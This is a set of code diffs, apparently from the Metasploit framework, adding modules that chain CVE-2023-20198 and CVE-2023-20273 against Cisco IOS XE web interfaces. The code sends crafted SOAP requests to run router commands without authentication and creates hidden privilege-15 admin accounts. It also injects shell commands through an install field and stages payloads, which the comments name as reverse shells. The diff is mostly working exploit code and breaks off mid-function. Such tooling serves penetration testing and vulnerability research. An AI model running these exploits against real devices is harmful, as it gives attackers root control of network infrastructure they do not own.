+        case str.to_sym
+        when USER_EXEC
+          USER_EXEC
+        when PRIVILEGED_EXEC
+          PRIVILEGED_EXEC
+        when GLOBAL_CONFIGURATION
+          GLOBAL_CONFIGURATION
+        end
+      end
+    end
+
     # Leverage CVE-2023-20198 to run an arbitrary CLI command against a vulnerable Cisco IOX XE device.
-    def run_cli_command(cmd, username = 'vty0')
+    def run_cli_command(cmd, mode, username = 'vty0')
+
+      case mode
+      when Mode::USER_EXEC
+        cmd = "exit\nexit\n" + cmd
+      when Mode::PRIVILEGED_EXEC
+        cmd = "exit\n" + cmd
+      end
 
       # As we place the cmd in CDATA, we cannot have hte closing tag in the command.
       if cmd.include? ']]>'

--- a/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
+++ b/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
@@ -1,0 +1,82 @@
+module Msf
+  module Exploit::Remote::HTTP::CiscoIosXe
+
+    # Leverage CVE-2023-20198 to run an arbitrary CLI command against a vulnerable Cisco IOX XE device.
+    def run_cli_command(cmd, username = 'vty0')
+
+      # As we place the cmd in CDATA, we cannot have hte closing tag in the command.
+      if cmd.include? ']]>'
+        print_error("CLI command contain bad sequence ']]>'.")
+        return nil
+      end
+
+      xml = %(<?xml version="1.0"?>
+  <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+    <SOAP:Header>
+      <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
+        <wsse:UsernameToken SOAP:mustUnderstand="false">
+          <wsse:Username>#{username}</wsse:Username>
+          <wsse:Password>*****</wsse:Password>
+        </wsse:UsernameToken>
+      </wsse:Security>
+    </SOAP:Header>
+    <SOAP:Body>
+      <request correlator="#{Rex::Text.rand_text_alpha(8)}" xmlns="urn:cisco:wsma-config">
+        <configApply details="all" action-on-fail="continue">
+          <config-data>
+           <cli-config-data-block><![CDATA[#{cmd}]]></cli-config-data-block>
+          </config-data>
+        </configApply>
+      </request>
+    </SOAP:Body>
+  </SOAP:Envelope>)
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => '/%2577ebui_wsma_https',
+        'data' => xml
+      )
+
+      return nil unless res&.code == 200
+
+      xml_doc = Nokogiri::XML(res.body)
+
+      xml_doc.remove_namespaces!
+
+      result = ''
+
+      xml_doc.xpath('//Envelope/Body/response/resultEntry/text').each do |val1|
+        result << val1.content
+      end
+
+      result
+    end
+
+    # Leverage CVE-2023-20273 to run an arbitrary OS command against a vulnerable Cisco IOX XE device.
+    def run_os_command(cmd, admin_username, admin_password)
+      # https://blog.leakix.net/2023/10/cisco-root-privesc/ reports that on version 17.* 'installMethod' is now 'mode'.
+      # We pass both to satisfy either version.
+      json = %({
+  "installMethod": "tftp",
+  "mode": "tftp",
+  "ipaddress": "#{Rex::Text.rand_text_hex(4)}:#{Rex::Text.rand_text_hex(4)}:#{Rex::Text.rand_text_hex(4)}:$(#{cmd})",
+  "operation_type": "SMU",
+  "filePath": "#{Rex::Text.rand_text_alpha(8)}",
+  "fileSystem": "flash:"
+})
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri('webui', 'rest', 'softwareMgmt', 'installAdd'),
+        'headers' => {
+          'Authorization' => basic_auth(admin_username, admin_password)
+        },
+        'data' => json
+      )
+
+      return false unless res&.code == 200
+
+      true
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
+++ b/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
@@ -98,9 +98,7 @@ module Msf
         'data' => json
       )
 
-      return false unless res&.code == 200
-
-      true
+      res&.code == 200
     end
   end
 end

--- a/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb
+++ b/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    print_status(result)
+    print_line(result)
   end
 
 end

--- a/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb
+++ b/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb
@@ -17,11 +17,12 @@ class MetasploitModule < Msf::Auxiliary
           This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the
           Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.
 
-          By default CLI commands are run in the Global configuration mode. To drop down to Privileged EXEC mode,
-          you can preface your command with the `exit` keyword followed by an (escaped) newline, e.g. To run the command
-          `show version` in Privileged EXEC mode, the CMD must be `exit\nshow version`. To run a command in Global
-          configuration mode, just set the `CMD` option to the command you want to run,
-          e.g. `username hax0r privilege 15 secret hax0r`.
+          By default [CLI commands](https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/02_cisco_ios_hierarchy.htm)
+          are run in the Global configuration mode. To drop down to Privileged EXEC mode, you can preface your command
+          with the `exit` keyword followed by an (escaped) newline, e.g. To run the command `show version` in Privileged
+          EXEC mode, the CMD must be `exit\nshow version`. To drop to User EXEC mode you can preface your command with
+          two `exit` keywords, e.g. `exit\nexit\nshow ip interface brief`. To run a command in Global configuration
+          mode, just set the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r`.
 
           The vulnerable IOS XE versions are:
           16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,

--- a/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb
+++ b/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HTTP::CiscoIosXe
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco IOX XE unauthenticated Command Line Interface (CLI) execution',
+        'Description' => %q{
+          This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the
+          Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.
+
+          By default CLI commands are run in the Global configuration mode. To drop down to Privileged EXEC mode,
+          you can preface your command with the `exit` keyword followed by an (escaped) newline, e.g. To run the command
+          `show version` in Privileged EXEC mode, the CMD must be `exit\nshow version`. To run a command in Global
+          configuration mode, just set the `CMD` option to the command you want to run,
+          e.g. `username hax0r privilege 15 secret hax0r`.
+
+          The vulnerable IOS XE versions are:
+          16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
+          16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
+          16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
+          16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
+          16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
+          16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
+          16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
+          16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
+          16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
+          16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
+          16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
+          16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
+          16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
+          17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
+          17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
+          17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
+          17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
+          17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
+          17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
+          17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
+          17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
+          17.11.99SW
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF module
+        ],
+        'References' => [
+          ['CVE', '2023-20198'],
+          # Vendor advisories.
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],
+          ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
+          # Vendor list of (205) vulnerable versions.
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],
+          # Technical details on CVE-2023-20198.
+          ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],
+          ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/']
+        ],
+        'DisclosureDate' => '2023-10-16',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('CMD', [ true, 'The Global configuration CLI command to execute. To drop to Privileged EXEC mode, preface your CMD with exit\\\\n, e.g "exit\\\\nshow version"', 'exit\\nshow version'])
+      ]
+    )
+  end
+
+  def run
+    cmd = datastore['CMD'].gsub('\\n', "\n")
+    if cmd.empty?
+      print_error('Command can not be empty.')
+      return
+    end
+
+    result = run_cli_command(cmd)
+    if result.nil?
+      print_error('Failed to run the command.')
+      return
+    end
+
+    print_status(result)
+  end
+
+end

--- a/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
+++ b/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
       admin_username = Rex::Text.rand_text_alpha(8)
       admin_password = Rex::Text.rand_text_alpha(8)
 
-      unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}")
+      unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)
         print_error('Failed to create admin user')
         return
       end
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Auxiliary
       ensure
         vprint_status("Removing user '#{admin_username}'")
 
-        unless run_cli_command("no username #{admin_username}")
+        unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)
           print_warning('Failed to remove user')
         end
       end

--- a/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
+++ b/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
@@ -1,0 +1,151 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HTTP::CiscoIosXe
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Retry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco IOX XE unauthenticated OS command execution',
+        'Description' => %q{
+          This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
+          devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.
+
+          This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,
+          CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read
+          back via the webserver. Finally the output file is deleted and the admin user is removed.
+
+          The vulnerable IOS XE versions are:
+          16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
+          16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
+          16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
+          16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
+          16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
+          16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
+          16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
+          16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
+          16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
+          16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
+          16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
+          16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
+          16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
+          17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
+          17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
+          17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
+          17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
+          17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
+          17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
+          17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
+          17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
+          17.11.99SW
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF module
+        ],
+        'References' => [
+          ['CVE', '2023-20198'],
+          ['CVE', '2023-20273'],
+          # Vendor advisories.
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],
+          ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
+          # Vendor list of (205) vulnerable versions.
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],
+          # Technical details on CVE-2023-20198.
+          ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],
+          ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'],
+          # Technical details on CVE-2023-20273.
+          ['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/']
+        ],
+        'DisclosureDate' => '2023-10-16',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('CMD', [ true, 'The OS command to execute.', 'id']),
+        OptInt.new('REMOVE_OUTPUT_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to removing the commands output file.', 30])
+      ]
+    )
+  end
+
+  def run
+    admin_username = Rex::Text.rand_text_alpha(8)
+    admin_password = Rex::Text.rand_text_alpha(8)
+
+    unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}")
+      print_error('Failed to create admin user')
+      return
+    end
+
+    begin
+      vprint_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'")
+
+      out_file = Rex::Text.rand_text_alpha(8)
+
+      cmd = "$(openssl enc -base64 -d <<< #{Base64.strict_encode64(datastore['CMD'])}) &> /var/www/#{out_file}"
+
+      unless run_os_command(cmd, admin_username, admin_password)
+        print_error('Failed to run command')
+        return
+      end
+
+      begin
+        res = send_request_cgi(
+          'method' => 'GET',
+          'uri' => normalize_uri('webui', out_file),
+          'headers' => {
+            'Authorization' => basic_auth(admin_username, admin_password)
+          }
+        )
+
+        unless res&.code == 200
+          print_error('Failed to get command output')
+          return
+        end
+
+        print_status(res.body)
+      ensure
+        vprint_status("Removing output file '/var/www/#{out_file}'")
+
+        # Deleting the output file can take more than one attempt.
+        success = retry_until_truthy(timeout: datastore['REMOVE_OUTPUT_TIMEOUT']) do
+          if run_os_command("rm /var/www/#{out_file}", admin_username, admin_password)
+            next true
+          end
+
+          vprint_status('Failed to delete output file, waiting and trying again...')
+          false
+        end
+
+        unless success
+          print_error("Failed to delete output file '/var/www/#{out_file}")
+          print_error(out_file)
+        end
+      end
+    ensure
+      vprint_status("Removing user '#{admin_username}'")
+
+      unless run_cli_command("no username #{admin_username}")
+        print_warning('Failed to remove user')
+      end
+    end
+  end
+
+end

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -1,0 +1,218 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::CiscoIosXe
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Retry
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco IOX XE Unauthenticated RCE Chain',
+        'Description' => %q{
+          This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
+          devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
+
+          The vulnerable IOS XE versions are:
+          16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
+          16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
+          16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
+          16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
+          16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
+          16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
+          16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
+          16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
+          16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
+          16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
+          16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
+          16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
+          16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
+          17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
+          17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
+          17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
+          17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
+          17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
+          17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
+          17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
+          17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
+          17.11.99SW
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit
+        ],
+        'References' => [
+          ['CVE', '2023-20198'],
+          ['CVE', '2023-20273'],
+          # Vendor advisories.
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],
+          ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
+          # Vendor list of (205) vulnerable versions.
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],
+          # Technical details on CVE-2023-20198.
+          ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],
+          ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'],
+          # Technical details on CVE-2023-20273.
+          ['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'],
+          # Full details of a successful exploitation attempt from a honey pot.
+          ['URL', 'https://gist.github.com/rashimo/a0ef01bc02e5e9fdf46bc4f3b5193cbf'],
+        ],
+        'DisclosureDate' => '2023-10-16',
+        'Privileged' => true,
+        'Platform' => %w[linux unix],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:
+            # cmd/linux/http/x64/meterpreter/reverse_tcp
+            # cmd/linux/http/x64/shell/reverse_tcp
+            # cmd/linux/http/x86/shell/reverse_tcp
+            'Linux Command',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_CMD]
+            },
+          ],
+          [
+            # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:
+            # cmd/unix/python/meterpreter/reverse_tcp
+            # cmd/unix/reverse_bash
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD]
+            },
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
+        # 'global' should work, but exposing this as an option will allow for usage in more complex network setups.
+        # A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
+        # inspect a devices configuration to see an appropriate VRF to use.
+        OptString.new('CISCO_VRF_NAME', [ true, "The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.", 'global']),
+        # We may need to try and execute a command a second time if it fails the first time. This option is the maximum
+        # number of seconds to keep trying.
+        OptInt.new('CISCO_CMD_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to execute a command.', 30])
+      ]
+    )
+  end
+
+  def check
+    # First, a get request to the root of the Web UI, this lets us verify the target is a Cisco IOS XE device with
+    # the Web UI exposed (which is the vulnerable component).
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri('webui')
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content.
+    if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?('cisco.com'))
+      return CheckCode::Unknown('Web UI not detected')
+    end
+
+    # By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number,
+    # so if this request succeeds, then we known the target is vulnerable.
+    res = run_cli_command('show version', Mode::PRIVILEGED_EXEC)
+
+    # If the above request failed, then the target is safe.
+    return CheckCode::Safe unless res
+
+    version = 'Cisco IOS XE Software'
+
+    # If we can pull out the version number via a regex, we do. If this fails, the target is still vulnerable
+    # (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format
+    # for the version information so our regex wont work.
+    # Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2
+    if res =~ /(Cisco IOS XE Software, Version [\d\S]+\.[\d\S]+\.[\d\S]+)/
+      version = Regexp.last_match(1)
+    end
+
+    CheckCode::Vulnerable(version)
+  end
+
+  def exploit
+    admin_username = rand_text_alpha(8)
+    admin_password = rand_text_alpha(8)
+
+    # Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.
+    unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)
+      fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
+    end
+
+    begin
+      print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'")
+
+      # Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...
+
+      # A shell script to execute the Metasploit payload. Will delete itself upon execution.
+      bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
+
+      # The location of our bootstrap script.
+      bootstrap_file = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
+
+      # NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and
+      # 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line.
+
+      # Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems
+      # with restricted chars, and leverage openssl to decode and write the contents to disk.
+      success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+        next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", admin_username, admin_password)
+      end
+
+      unless success
